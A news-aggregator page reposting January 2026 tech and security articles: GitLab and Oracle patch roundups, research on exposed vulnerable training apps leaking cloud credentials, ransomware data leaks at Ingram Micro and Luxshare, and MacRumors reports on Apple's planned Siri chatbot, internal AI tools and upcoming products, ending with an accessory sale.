CVE-2025-13927, a denial of service issue in Jira Connect integration. If exploited on an unpatched system, it could allow an unauthenticated user to create a denial of service condition by sending crafted requests with malformed authentication data. It carries a CVSS severity score of 7.5; CVE-2025-13928, an incorrect authorization issue. If exploited on an unpatched system, it could allow an unauthenticated user to cause a denial of service condition by exploiting incorrect authorization validation in API endpoints.  It carries a CVSS severity score of 7.5; CVE-2025-13335, an infinite loop issue in Wiki redirects. Under certain circumstances, this hole could allow an authenticated user to create a denial of service condition by configuring malformed Wiki documents that bypass cycle detection. It has a CVSS score of 6.5; CVE-2026-1102 – a denial of service issue in an API endpoint that could allow an unauthenticated user to create a denial of service condition by sending repeated malformed SSH authentication requests. It has a CVSS score of 5.3. In keeping with standard GitLab practice, details of the security vulnerabilities will be made public on an issue tracker 30 days after the release in which they were patched. 
The new versions also include bug fixes, some of which, GitLab said, may include database migrations. In cases of single-node instances, a patch will cause downtime during the upgrade. In the case of multi-node instances, admins who follow proper GitLab zero-downtime upgrade procedures can apply a patch without downtime.
View the full article

• 0 comments
• 32 views

CSOonline

January 21Jan 21

Misconfigured demo environments are turning into cloud backdoors to the enterprise

Misconfigured demo environments are turning into cloud backdoors to the enterprise

Internal testing, product demonstrations, and security training are critical practices in cybersecurity, giving defenders and everyday users the tools and wherewithal to prevent and respond to enterprise threats.
However, according to new research from Pentera Labs, when left in default or misconfigured states, these “test” and “demo” environments are yet another entry point for attackers — and the issue even affects leading security companies and Fortune 500 companies that should know better.
Researchers discovered that popular public training apps like Hackazon, Damn Vulnerable Web Application (DVWA), and OWASP Juice Shop have been frequently left accessible to the public internet, inadvertently exposing top vendors including Palo Alto Networks, Cloudflare, and F5.
“This is not theoretical research,” Noam Yaffe, Pentera’s senior researcher and offensive security team lead, wrote in a technical blog post. His team discovered “clear evidence” that these attack vectors are being exploited in the wild to enable crypto miners, webshells, and persistence mechanisms. The attackers are believed to be of Eastern European origin.
“This research proves that labeling something as ‘training’ or ‘dev’ doesn’t make it invisible to attackers,” Yaffe noted. “If it’s on the internet and it has cloud credentials, it’s a target.”
Exposing crown jewels through seemingly harmless labs
After identifying an exposed instance of Hackazon, a free, intentionally vulnerable test site developed by Deloitte, during a routine cloud security assessment for a client, Yaffe performed a five-step hunt for exposed apps. His team uncovered 1,926 “verified, live, and vulnerable applications,” more than half of which were running on enterprise-owned infrastructure on AWS, Azure, and Google Cloud platforms.
They then discovered 109 exposed credential sets, many accessible via a low-priority lab environment, tied to overly-privileged identity access management (IAM) roles. These often granted “far more access” than a ‘training’ app should, Yaffe explained, and provided attackers:
Administrator-level access to cloud accounts, as well as full access to S3 buckets, GCS, and Azure Blob Storage; The ability to launch and destruct compute resources and read and write to secrets managers; Permissions to interact with container registries where images are stored, shared, and deployed. Attackers maintained persistent access, moved laterally across networks, exploited cloud credentials and other sensitive information, and crypto-mined victim infrastructure. Further, Pentera’s researchers easily discovered active secrets such as Slack keys, GitHub tokens, and Docker Hub credentials, as well as real user data and proprietary source code.
Alarmingly, in DVWA, 54% of instances discovered still used the default credentials ‘admin:password,’ and attackers could downgrade security settings in a single click (from “impossible” to “low”), making every built-in vulnerability “trivially exploitable,” Yaffe noted.
“What began as a harmless lab could lead directly to an organization’s crown jewels,” he said.
Real-world exploitations
In one real-world instance, Pentera’s team discovered a misconfigured buggy web application (bWAPP) linked to Cloudflare cloud accounts running on Google Cloud Platform (GCP). bWAPP is a free, open source, deliberately insecure web app used for training purposes. Querying GCP’s metadata services, the researchers were able to impersonate default service accounts and gain read access to “hundreds” of storage buckets.
Similarly, a DVWA linked to F5’s cloud accounts was found running on a GCP instance, again allowing the researchers to access numerous storage buckets containing logs and metric data. In addition, a misconfigured Palo Alto-linked DVWA app was identified running on AWS; Yaffe and his team used the attached IAM role and temporary credentials to gain full administrative access to the AWS account.
Researchers also exfiltrated OAuth tokens for a GCP service account to assume its identity, and list and access specific bucket content. For instance, one “cloud_build” bucket stored .tgz files that attackers could easily download. The account was managed by an admin email and violated least privilege because it contained policy permission, Yaffe explained.
“Even though this was a ‘dev’/ ‘training’ account, it contained highly sensitive secrets, credentials, and API tokens,” he said.
In assessing these misconfigured, vulnerable applications, his team found “clear evidence” that they were already being fully exploited in the wild. Roughly 20% of the DVWA instances they discovered contained artifacts deployed by malicious actors, including:
XMRig Crypto Miner actively running, sending proceeds to attacker-controlled wallets, and configured to run silently without user knowledge; A “sophisticated” watchdog script that maintained persistence even after a compromise had been discovered. This featured self-recovery, automated downloads, encrypted payload delivery, evidence deletion, and kill switches that threat actors could use to easily shut down operations; A PHP webshell that granted attackers the ability to read, write, delete, upload and download files; run operating system (OS) commands and scripts on remote machines; and access credentials, API keys, and other secrets embedded in source code. All discoveries were responsibly disclosed to the impacted organizations and were subsequently mitigated prior to publication, Yaffe emphasized.
“These weren’t isolated incidents; they represented an organized, ongoing exploitation campaign,” he warned.
What enterprises can do now
To defend against this widespread threat, Yaffe and his team developed SigInt, a Python-based, large language model (LLM)-powered autonomous reconnaissance framework. The tool, which is available on GitHub, generates fingerprint signatures directly from a live target or GitHub repository, searches for matches, and applies confidence scoring. It also incorporates IP intelligence, cloud provider detection, attribution data, and provides analysis to support further investigation.
Beyond this, Yaffe advised enterprises to “inventory everything” to establish a complete, up-to-date picture of all cloud resources, including ‘temporary’ and ‘test deployments,’ perform regular audits to scan for exposed services, and apply least privilege.
“Never attach broad IAM roles to training or demo environments,” he said.
Further, defenders should isolate training environments from production networks and apply the same monitoring and alerting to them as production environments, restrict their outbound internet access, document and enforce changes to default credentials pre-deployment, and set controls that expire temporary testing environments after a specified timeframe. “If it doesn’t have an end date, it will run forever,” Yaffe noted.
Ultimately, he emphasized: “These are fixable problems. Basic hygiene … would have prevented every case we found.”
View the full article

• 0 comments
• 34 views

CSOonline

January 21Jan 21

Will Apple Charge for Its Siri Chatbot?

Will Apple Charge for Its Siri Chatbot?

Apple is apparently working on a Siri chatbot that will rival Claude, Gemini, and ChatGPT, and Apple is aiming to debut it in less than six months when iOS 27 is unveiled at WWDC. Bloomberg shared details on the chatbot earlier today, but there was one major question unanswered: what will Apple charge?


Anthropic, Google, OpenAI, and other companies that run major chatbots offer a free version, but it's often throttled and a paid subscription is required for full functionality. Apple is reportedly planning to integrate its Siri chatbot deeply into iOS, iPadOS, and macOS instead of offering a standalone app. A ‌Siri‌ chatbot available on billions of devices is going to be expensive to run, but ‌Siri‌ is also so core to Apple products that people aren't going to want to pay for what's always been free.

What the Siri Chatbot Can Do

Per Bloomberg, the ‌Siri‌ chatbot will be able to "search the web for information, create content, generate images, summarize information and analyze uploaded files." It will also be able to control Apple devices and use personal data and on-screen information for search and to complete tasks. That sounds like just about everything that existing chatbots like ChatGPT can do, plus Apple is integrating the chatbot into all of its apps.

On-Device Siri Chatbot?

Some of those tasks can be completed on-device using the powerful A-series and M-series chips Apple has been building into its products, but Apple is using a custom AI model developed with the Google Gemini team. According to Bloomberg, the model is roughly comparable to Gemini 3, and the full version of Gemini 3 can't run on a high-end Mac, let alone a mobile device.

Apple is going to need servers to run the ‌Siri‌ chatbot, and while it has been building Private Cloud Compute servers for AI features, it's unlikely that it has enough for a ‌Siri‌ chatbot. Bloomberg suggests that Apple is actually discussing running its chatbot on Google servers, and Google isn't going to do that for free.

Compute Costs and Infrastructure

Whether Apple is using its own private cloud compute servers or Google's Tensor servers, it needs serious compute power. Every question ‌Siri‌ is asked and every image ‌Siri‌ generates will cost Apple.

OpenAI is not profitable, and it spends billions on inference each year. OpenAI has committed to spending $1.4 trillion on infrastructure to keep up with demand, an amount of money that it doesn't have yet. Google spent $85 billion on infrastructure to meet AI demand in 2025. In August, Google said that the median Gemini Apps text prompt uses 0.24 watt-hours of energy. At scale, across all Google devices and all Google products, that's hundreds of millions of dollars per year just in electricity costs.

How Gemini is Priced

Google has already integrated Gemini into its Pixel smartphones and other Android devices. It has a split tier system that Apple might adopt.

Android users have access to a free version of Gemini that costs Google less to run. It can answer questions, summarize text, write emails, and control apps and smartphone features. Android users have to pay $20 per month for Gemini Advanced to get access to the more advanced version of Gemini that offers better reasoning, longer context for analyzing bigger documents, and improved coding.

Apple could do something similar, offering a basic version of ‌Siri‌ that's accessible to everyone, with more advanced models available with a subscription. iCloud already provides a model for a free/paid product split. Apple offers all Apple users 5GB of cloud storage for free, but anything more will cost you.

Temporarily Free?

Apple could make its ‌Siri‌ chatbot free to use to begin with, which would lure users who are paying for other services like ChatGPT. ChatGPT, Claude, and Gemini are all around $20 per month, so Apple eating ‌Siri‌ chatbot costs for a year or two would be hard to compete with. Even undercutting current prices would likely lure customers and make Apple an immediate key player in the AI market.

Right now, Apple Intelligence is entirely free to use even for images generated with Image Playground, but the capabilities are limited and some functionality runs on-device.

Possible Cost

Apple might not be able to absorb AI costs, and there could be paid options right when the ‌Siri‌ chatbot launches. If that's the case, pricing will likely be competitive with existing chatbots.

AI companies have decided entry-level plans should cost $20/month, but it's not clear if that price point is actually sustainable with the growing costs of training new models and supporting more users.

ChatGPT Plus - $20/month
Copilot Pro - $20/month
Gemini Advanced - $19.99/month
Claude Pro - $20/month
Perplexity Pro - $20/month

Siri ChatGPT Integration

Right now, Apple has a partnership with OpenAI to hand complex requests off to ChatGPT. Apple doesn't pay OpenAI for this feature, but it does put ChatGPT in front of millions of Apple users. When Apple launches its ‌Siri‌ chatbot, ChatGPT integration could be removed.

Eliminating the ChatGPT integration might also impact Apple's legal battle with Elon Musk. Musk's xAI company sued Apple and OpenAI for colluding to promote ChatGPT over other AI bots like Grok, arguing that Apple should let other chatbots integrate with ‌Siri‌.

If Apple stops offering ChatGPT through ‌Siri‌ in favor of its own ‌Siri‌ chatbot, it would be no different than Google integrating Gemini into all Android devices, or Meta limiting its smart glasses to Meta AI.

Launch Timing

We'll probably be hearing more about the ‌Siri‌ chatbot in the coming months. Apple is aiming to unveil the functionality in iOS 27, iPadOS 27, and macOS 27, which will be previewed in June at WWDC.
This article, "Will Apple Charge for Its Siri Chatbot?" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 28 views

reporter

January 21Jan 21

Apple Developing AirTag-Sized AI Pin With Dual Cameras

Apple Developing AirTag-Sized AI Pin With Dual Cameras

Apple is working on a small, wearable AI pin equipped with multiple cameras, a speaker, and microphones, reports The Information. If it actually launches, the AI pin will likely run the new Siri chatbot that Apple plans to unveil in iOS 27.


The pin is said to be similar in size to an AirTag, with a thin, flat, circular disc shape. It has an aluminum and glass shell, and two cameras at the front. There is a standard lens and a wide-angle lens that are meant to capture photos and videos, while three microphones are designed to pick up sound around the wearer. An included speaker allows the pin to play audio, and there is a physical control button along one edge. The device is able to wirelessly charge like an Apple Watch.

Apple wants the final version of the pin to be about the same size as an ‌AirTag‌, but it will be slightly thicker. Currently, there is no built-in attachment method, but that could change later in development.

The Information says it is not clear if Apple plans to sell the pin on its own or bundle it with future smart glasses or other devices, but the physical button and built-in cameras, speakers, and microphones suggest that it can operate independently.

AI pins and wearables have not fared well so far, but multiple companies are developing AI wearables. OpenAI is teaming up with Jony Ive for some kind of small AI device that may or may not be wearable, and it has multiple other AI products in the works. Meta has AI glasses, and Amazon has the Bee bracelet. Dozens of other small companies have created small, AI-integrated wearables and devices, which means Apple needs to keep pace.

Apple's AI pin could be released as soon as 2027, but The Information cautions that development is in the early stages and could be canceled.
This article, "Apple Developing AirTag-Sized AI Pin With Dual Cameras" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 26 views

reporter

January 21Jan 21

Mark Your Calendar: Apple's Key Dates to Watch Over the Next Month

Mark Your Calendar: Apple's Key Dates to Watch Over the Next Month

While the first few weeks of 2026 have been relatively slow for Apple, things should start to pick up soon. Apple Creator Studio launches next week, and there are a handful of other items on the company's agenda over the next month.


Below, we have listed key Apple dates to watch through February:


Wednesday, January 28: Apple Creator Studio launches. The all-in-one subscription bundle provides access to the Final Cut Pro, Logic Pro, Pixelmator Pro, Motion, Compressor, and MainStage apps, along with premium content across the Final Cut Pro, Pixelmator Pro, Numbers, Pages, Keynote, and Freeform apps. In the U.S., pricing is set at $12.99 per month or $129 per year.
Thursday, January 29: Apple will report its earnings results for the first quarter of its 2026 fiscal year, which encompasses the holiday shopping season. Apple updated the iPad Pro, MacBook Pro, and Vision Pro with the M5 chip during the quarter. Apple's CEO Tim Cook and CFO Kevan Parekh will discuss the results on a conference call at 5 p.m. Eastern Time. You can listen live on Apple's website.
Thursday, February 5: Another four games are coming to Apple Arcade, including Retrocade, which lets you play classic arcade games like Asteroids, PAC-MAN, Breakout, Galaga, and Space Invaders. One of the other additions will be an arcade version of the popular PC game Sid Meier's Civilization VII.
Friday, February 6: Apple will accept submissions for the 2026 Swift Student Challenge from Friday, February 6 through Saturday, February 28. Some of the winners will be invited to spend three days at Apple Park during WWDC 2026 in June.
Sunday, February 8: Apple Music is the official sponsor of the Super Bowl LX Halftime Show, which will be held on Sunday, February 8. This year's performer is Puerto Rican rapper and singer Bad Bunny.
Tuesday, February 10: A few years ago, Apple's Home app was rearchitected, and the company will be ending support for the original architecture on this day. If you do not update, Apple warns you might experience issues.
Tuesday, February 24: Apple will be holding its annual shareholders meeting at 8 a.m. Pacific Time, and it will once again be held virtually. Apple shareholders of record as of January 2, 2026 can vote to re-elect the company's board of directors, ask questions, and more. Apple rarely answers any questions about future plans, so the meetings are often unremarkable from a news perspective.
These are only the dates that we know about, and there could be new product announcements and more over the coming weeks. Stay tuned!
This article, "Mark Your Calendar: Apple's Key Dates to Watch Over the Next Month" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 27 views

reporter

January 21Jan 21

A Siri Chatbot is Coming in iOS 27

A Siri Chatbot is Coming in iOS 27

Apple plans to turn Siri into a chatbot that will rival Anthropic's Claude, Google's Gemini, and OpenAI's ChatGPT, reports Bloomberg. Apple did not initially plan to introduce a chatbot, but their popularity forced Apple executives to reconsider.


Codenamed Campos, the ‌Siri‌ chatbot will be integrated into iOS 27, iPadOS 27, and macOS 27, replacing the current version of ‌Siri‌. It will have the same natural language conversation functionality as chatbots like ChatGPT, and it will be accessible by using the "‌Siri‌" wake word or by holding down the side button on an iPhone or iPad.

Apple is testing the ‌Siri‌ chatbot as a standalone app, but it won't be offered in app form. Instead, it will be built directly into Apple devices. Apple plans to power the chatbot with a custom model based on Google Gemini.

Apple's chatbot will be able to search the web, generate content like images, help with coding, summarize information, and analyze uploaded files. It will be able to use personal data on a person's device to complete tasks, and it will result in a much improved search feature. Apple is also designing a feature that will let the ‌Siri‌ chatbot view open windows and on-screen content, as well as adjust device features and settings.

‌Siri‌ will integrate into all Apple apps, including Photos, Mail, Messages, Music, and TV, and it will be able to access and analyze content in the apps to respond to queries and requests.

Apple is considering how much the ‌Siri‌ chatbot will remember. Claude and ChatGPT are able to glean information about users from past conversations for personalization purposes, but Apple may limit ‌Siri‌'s memory for privacy purposes.

The ‌Siri‌ chatbot will be an upgrade to the more personalized version of ‌Siri‌ that Apple plans to roll out in iOS 26.4. With iOS 26.4, Apple will make ‌Siri‌ more capable, implementing the Apple Intelligence features that it initially promised in iOS 18. The much more powerful chatbot version of ‌Siri‌ will follow later in the year, in iOS 27 and its sister updates.

Apple currently plans to unveil ‌Siri‌ chatbot at the Worldwide Developers Conference in June, after which testing of iOS 27 will begin.

The ‌Siri‌ chatbot will be the key new feature in iOS 27, iPadOS 27, and macOS 27, with Apple otherwise focusing on fixing bugs and improving performance.
This article, "A Siri Chatbot is Coming in iOS 27" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 37 views

reporter

January 21Jan 21

Ingram Micro admits 42,000 people impacted by ransomware attack

Ingram Micro admits 42,000 people impacted by ransomware attack

In July 2025, Ingram Micros suffered devastating consequences from a ransomware in which the IT distributor’s logistics were paralyzed for a week.
It has now emerged that sensitive data was also leaked. As Ingram Micro confirmed in a mandatory filing with US authorities, more than 42,000 people are affected. The perpetrators reportedly obtained information from current and former employees as well as job applicants.
In addition to basic personal data such as names and contact information, birth dates, ID numbers, and Social Security numbers were also disclosed. Furthermore, documents from application processes and employee evaluations were stolen. The IT distributor employs approximately 23,500 people worldwide.
Shortly after the attack became public, the ransomware gang Safepay announced it had stolen 3.5 terabytes of data from Ingram Micro. The group emerged in September 2024 and is now one of the most active cyber gangs.
View the full article

• 0 comments
• 32 views

CSOonline

January 21Jan 21

Oracle releases 337 security patches, including fix for critical Apache Tika flaw

Oracle releases 337 security patches, including fix for critical Apache Tika flaw

Oracle has handed security teams their first big patching workload of the year, with its latest quarterly update containing a hefty 337 security fixes across its product range, including 27 rated critical.
This imposing number of patches won’t surprise anyone whose job it is to look after Oracle products; in 2025 the company averaged 344 per update, so 337 is in line with this.
The first job with large updates like this is working out where to start and what to prioritize. That usually means assessing the flaws in core products while paying careful attention to severity.
In terms of the latter, the good news is that, as far as Oracle knows, none of January’s vulnerabilities is being exploited in the wild. That means there are no zero days to worry about this time.
There is no guarantee this won’t change, which is why security teams will pay closest attention to the 27 patches that map to 13 CVEs with a critical rating.
There was a time when updates were about fixing flaws in proprietary code. Those days are long gone; a significant portion of the January update deals with issues affecting third-party code such as open source libraries used by Oracle inside its products.
That’s also why individual CVEs now often generate multiple patches across different products, which can make assessing what to fix more demanding.
A high-priority example of this is CVE-2026-21962 affecting the Oracle HTTP Server and Oracle Weblogic Server Proxy Plug-in. Given a maximum CVSS score of 10, this critical severity vulnerability is addressed by seven different patches, depending on which product contains the vulnerable code.
CVE bloat
Also confusing is the fact that some CVEs listed in the latest update relate to CVEs from previous quarterly updates. A notable example of this is CVE-2025-66516, rated 9.8 (critical) on CVSS, affecting Oracle Middleware Common Libraries and Tools, which has a precursor in CVE-2025-54988. It addresses the high-profile Apache Tika issue first discovered in August, whose scope was expanded to cover more components in December.
This phenomenon of CVE bloat applies to around 50 of the vulnerabilities in the January update, in some cases with a single new CVE referring to multiple older CVEs.
As for products, the biggest offender, with 56 patches to be applied, is the Zero Data Loss Recovery Appliance (ZDLRA); almost all are fixes for third-party components. Despite 34 of these being described as remotely exploitable, only one has a new CVE identifier, the CVSS 3.1 (low) severity CVE-2026-21977.
For anyone applying patches, this nuance is important; a product might only have one new CVE behind which lie multiple others identified in CVEs from other vendors.
Just behind ZDLRA in patch volume are Oracle Enterprise Manager, with 51 patches, 47 of which can be remotely exploited without authentication, and Oracle E-Business Suite, with 38 patches, 33 of which are remotely exploitable.
Despite Oracle’s comprehensive patching cycle, the company’s approach to security has not always been effective. In 2025, a threat actor claimed to have stolen six million records from a vulnerable Oracle server, a claim the company repeatedly denied.
Security company CloudSEK later identified the vulnerability that led to the alleged hack as being CVE-2021-35587, an old issue that should have been patched. Presumably coincidentally, in August it was announced that long-serving chief security officer Mary Ann Davidson was leaving the company.
View the full article

• 0 comments
• 38 views

CSOonline

January 21Jan 21

Apple Employees Using 'Enchanté' Internal AI Chatbot to Speed Up Work

Apple Employees Using 'Enchanté' Internal AI Chatbot to Speed Up Work

Apple hasn't developed an AI chatbot for consumers, but it has been using them internally for some time now. Last year, Bloomberg's Mark Gurman detailed a Veritas chatbot to test the new version of Siri, and now Macworld has shared details on two other AI tools that Apple employees are allegedly using.


Enchanté is apparently a chatbot that rolled out to employees in November 2025, and it is an "internal ChatGPT-like assistant" that Apple workers can use for "ideas, development, proofreading, and even general knowledge answers."

The tool is said to look similar to the ChatGPT app for macOS, and it runs models approved by Apple. It is run locally or on private servers, and it incorporates Apple Foundation Models, Claude, and Gemini. Employees can upload documents, images, and files for analysis, and the app can access files stored on a Mac.

Apple encourages employees to use Enchanté as a test platform and for everyday work tasks, because it incorporates Apple internal documentation and guidelines.

The second AI tool that Apple developed is called Enterprise Assistant, and it is designed to be a knowledge hub for corporate employees. Macworld says that it has a database of Apple internal policies, so workers can ask questions about everything from company conduct guidelines to health insurance benefits.

It's no surprise that Apple is using AI tools internally, and there have been reports about Apple testing different AI features and platforms since 2023. In 2024, for example, Apple tested a ChatGPT-like generative AI tool that allows AppleCare employees to speed up technical support.

Apple hasn't rolled out consumer-facing chatbot features as of yet, but it has tested a Support Assistant in the Apple Support app. The Support Assistant uses natural language to provide users with help solving issues with Apple devices.

Later this year, Apple plans to introduce an overhauled version of ‌Siri‌ that's powered by Google Gemini, and it will also incorporate chatbot features.
This article, "Apple Employees Using 'Enchanté' Internal AI Chatbot to Speed Up Work" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 136 views

reporter

January 21Jan 21

Apple Expected to Unveil Five All-New Products This Year

Apple Expected to Unveil Five All-New Products This Year

In addition to updating many of its existing products, Apple is expected to unveil five all-new products this year, including a smart home hub, a Face ID doorbell, a MacBook with an A18 Pro chip, a foldable iPhone, and augmented reality glasses.


Below, we have recapped rumored features for each product.

Smart Home Hub

Apple home hub (concept)
Apple's long-rumored smart home hub should be released this year, according to rumors. The device was originally expected to be unveiled last year, but the launch was reportedly postponed until the more personalized version of Siri is ready.

The home hub is rumored to feature a 6-inch to 7-inch square display, and an A18 chip for Apple Intelligence support. The device can reportedly be attached to a speaker base, or mounted on a wall, and it would allow users to control smart home accessories, make FaceTime video calls, and more. It might even double as a home security system.

Smart Doorbell


In December 2024, Bloomberg's Mark Gurman reported that Apple was in the early stages of developing a smart home doorbell and lock system with Face ID. He said the doorbell would wirelessly connect to a compatible deadbolt lock.

Gurman said Apple's doorbell would launch in 2026 at the earliest, so it could be unveiled this year if that timeframe remains accurate.

Apple would surely tout the privacy and security benefits of its own smart home doorbell. Apple already offers a HomeKit Secure Video service with end-to-end encryption for storing footage in iCloud, and the doorbell could have a Secure Enclave.

The doorbell would be one of several new smart home products that Apple is reportedly planning, with the others being the aforementioned smart home hub, and own HomeKit-enabled indoor camera. This would add to a lineup of home products that already includes the Apple TV, HomePod, and HomePod mini.

MacBook With A18 Pro Chip


Apple plans to release a lower-priced MacBook with a version of the iPhone 16 Pro's A18 Pro chip this year, according to several reports and leakers. This would be an all-new model positioned below the MacBook Air in the Mac lineup.

Apple supply chain analyst Ming-Chi Kuo was first to reveal that Apple is allegedly planning a more affordable MacBook. Last year, he said the laptop would have around a 13-inch display and come in silver, blue, pink, and yellow finishes. A few rumors have specifically mentioned that it will have a 12.9-inch display.

The lower-cost MacBook could have a lot in common with the discontinued 12-inch MacBook, including an ultra-thin and lightweight design. However, that model was powered by Intel processors. Apple stopped selling the 12-inch MacBook in July 2019, so there has been a long wait for a similar model powered by Apple silicon.

In the iPhone 16 Pro, the A18 Pro chip has a 6-core CPU and a 6-core GPU. The chip's performance is similar to the M1 chip, so this new MacBook could effectively be a replacement for the old MacBook Air with the M1 chip, which Apple still sells through Walmart for $599. The new MacBook would likely start at $699 or $799.

With the A18 Pro chip, the lower-cost MacBook might have only 8GB of RAM, whereas all current MacBook Air and MacBook Pro models start with at least 16GB of RAM. The chip also lacks Thunderbolt support, so the new MacBook would likely be equipped with regular USB-C ports, with slower data transfer speeds and external display limitations.

Foldable iPhone

A foldable iPhone (concept)
Following years of rumors, Apple is expected to release its long-awaited foldable iPhone in September, alongside the iPhone 18 Pro and iPhone 18 Pro Max. Like Samsung's Galaxy Z Fold 7, the device will open up like a book, providing users with a large screen for watching videos, playing games, and multitasking.

The foldable iPhone will be equipped with a 7.7-inch inner display, and a 5.3-inch outer display, according to the latest report. The device will apparently have a virtually "crease-free" inner display supplied by Samsung.

Kuo expects the foldable iPhone to have two rear cameras, one front camera, and a Touch ID power button instead of Face ID.

This will undoubtedly be Apple's most expensive iPhone ever.

Augmented Reality Glasses

Meta Ray-Ban smart glasses
Apple reportedly plans to unveil augmented reality smart glasses as early as this year, although they might not begin arriving to customers until 2027.

Apple's glasses would compete with the Meta Ray-Bans, which now offer an in-lens display.

Apple's first smart glasses will reportedly have speakers for music playback, cameras for photos and video, voice control, and potentially health features, but an in-lens display is not expected until at least the second generation.Tags: Apple Doorbell, Apple Glasses, Apple Smart Home Display, Foldable iPhone, MacBook (A18 Pro)
This article, "Apple Expected to Unveil Five All-New Products This Year" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 37 views

reporter

January 21Jan 21

Volvo's New EX60 SUV Features Pre-Installed Apple Music App With Spatial Audio

Volvo's New EX60 SUV Features Pre-Installed Apple Music App With Spatial Audio

Volvo's new EX60 mid-size electric SUV is set to be the first Volvo vehicle that comes with an Apple Music app pre-installed, Volvo said today. The vehicle will be equipped with ‌Apple Music‌ with Dolby Atmos, providing an immersive Spatial Audio experience.


‌Apple Music‌ will be available as an app accessible through the vehicle's built-in infotainment system, making it available for those who do not use CarPlay. Using the app requires an ‌Apple Music‌ subscription.

Volvo is equipping the EX60 with its HuginCore system that integrates AI and technology developed by Google, Nvidia, and Qualcomm. Gemini is deeply integrated in the vehicle, allowing the car to be controlled with natural language commands.

While the EX60 has deep Google Gemini integration, it continues to support ‌CarPlay‌. Volvo says that Wireless Apple ‌CarPlay‌ comes standard on the EX60, with users able to connect their iPhone to the car's infotainment system to access Apple apps, music, and navigation.

The EX60 also includes digital key plus, so it can be unlocked and turned on with an ‌iPhone‌ or Apple Watch.

Volvo is selling the EX60 in European markets starting now, and US availability will follow in the spring. Orders will be delivered starting in summer.Tag: Apple Music
This article, "Volvo's New EX60 SUV Features Pre-Installed Apple Music App With Spatial Audio" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 30 views

reporter

January 21Jan 21

Apple's Secret Product Plans Stolen in Luxshare Cyberattack

Apple's Secret Product Plans Stolen in Luxshare Cyberattack

The Apple supplier subject to a major cyberattack last month was China's Luxshare, it has now emerged. More than 1TB of confidential Apple information was reportedly stolen.


It was reported in December that one of Apple's assemblers suffered a significant cyberattack that may have compromised sensitive production-line information and manufacturing data linked to Apple. The specific company targeted, the scope of the breach, and its operational impact were unclear until now.

The attack was first revealed on RansomHub's dark web leak site on December 15, 2025, where the group claimed it had encrypted internal Luxshare systems and exfiltrated large volumes of confidential data belonging to the company and its customers. The attackers warned that the information would be publicly released unless Luxshare contacted them to negotiate, and accused the company of attempting to conceal the incident.

According to the attackers' claims, the exfiltrated material includes vital files such as detailed 3D CAD product models and high-precision geometric files, 2D manufacturing drawings, mechanical component designs, circuit board layouts, and internal engineering PDFs. The group added that the large archives include Apple product data as well as information belonging to Nvidia, LG, Tesla, Geely, and other major clients.

The attackers subsequently wrote that Luxshare management had been given time to respond but had failed to do so, and that the stolen archives contained confidential project documentation protected under non-disclosure agreements. The post was accompanied by data samples that the group said were provided as proof of compromise.

Cybernews reported that its research team reviewed portions of the leaked sample data attached to the post and found what appeared to be legitimate internal Luxshare documentation tied to Apple projects. The materials explain confidential repair procedures and logistics workflows between Apple and Luxshare, including detailed process descriptions, timelines, and partner coordination documents.

Files commonly used in product design and manufacturing workflows, such as .dwg and Gerber files, were present in the samples reviewed. The projects referenced in the samples span a period from 2019 through to 2025. As such, it seems likely that unreleased products may be included. The researchers also said the sample data appears to include personally identifiable information of individuals involved in Apple projects, such as full names, job titles, and work email addresses.

Access to detailed engineering designs and manufacturing documentation could pose risks if they are misused, such as product reverse engineering, counterfeit manufacturing, and targeted attacks on hardware or firmware facilitated by detailed knowledge of device layouts and component interactions. Exposure of employee contact information and internal workflows could also increase the risk of targeted phishing or follow-on intrusions against Apple's other partners. Neither Apple nor Luxshare have confirmed the cyberattack.Tags: Cybersecurity, Luxshare
This article, "Apple's Secret Product Plans Stolen in Luxshare Cyberattack" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 29 views

reporter

January 21Jan 21

North Korean PurpleBravo Campaign Targeted 3,136 IP Addresses via Fake Job Interviews

North Korean PurpleBravo Campaign Targeted 3,136 IP Addresses via Fake Job Interviews

As many as 3,136 individual IP addresses linked to likely targets of the Contagious Interview activity have been identified, with the campaign claiming 20 potential victim organizations spanning artificial intelligence (AI), cryptocurrency, financial services, IT services, marketing, and software development sectors in Europe, South Asia, the Middle East, and Central America. The new findingsView the full article

• 0 comments
• 53 views

Hacker News

January 21Jan 21

Zoom and GitLab Release Security Updates Fixing RCE, DoS, and 2FA Bypass Flaws

Zoom and GitLab Release Security Updates Fixing RCE, DoS, and 2FA Bypass Flaws

Zoom and GitLab have released security updates to resolve a number of security vulnerabilities that could result in denial-of-service (DoS) and remote code execution. The most severe of the lot is a critical security flaw impacting Zoom Node Multimedia Routers (MMRs) that could permit a meeting participant to conduct remote code execution attacks. The vulnerability, tracked as CVE-2026-22844View the full article

• 0 comments
• 60 views

Hacker News

January 21Jan 21

Refresh Your Workspace for 2026 With 20% Off Satechi's Best Desktop Accessories

Refresh Your Workspace for 2026 With 20% Off Satechi's Best Desktop Accessories

Satechi recently kicked off a new sale that has its most popular desktop accessories at 20 percent off for a limited time. To get this discount, enter the code REFRESH20 at checkout on the accessories found in Satechi's "Dark Refresh Collection."

Note: MacRumors is an affiliate partner with Satechi. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

This sale includes products like Qi2 wireless chargers, Bluetooth keyboards, USB-C hubs, Thunderbolt accessories, and more. Satechi provides free shipping on orders with a value that exceeds $20, so many of the products in this sale should automatically net you the free shipping bonus.

Note: Use code REFRESH20 to see this discount.
20% OFFSatechi's Refresh 2026 Sale

Additionally, Satechi announced a few products at CES earlier this month, and to mark the launch it's providing a 20 percent discount on these devices for early adopters. You can use the code CES2026 at checkout to get 20 percent off all five of Satechi's newest products.

Note: Use code CES2026 to see this discount.
20% OFFSatechi's CES 2026 Sale

Satechi's new CES 2026 products include two wireless keyboards, a wireless mouse, Thunderbolt 5 cable, and Thunderbolt 5 CubeDock with SSD Enclosure. All items in this sale are available to purchase and ship now, with the exception of the Thunderbolt 5 CubeDock, which is up for pre-order with an estimated shipping date of late March.

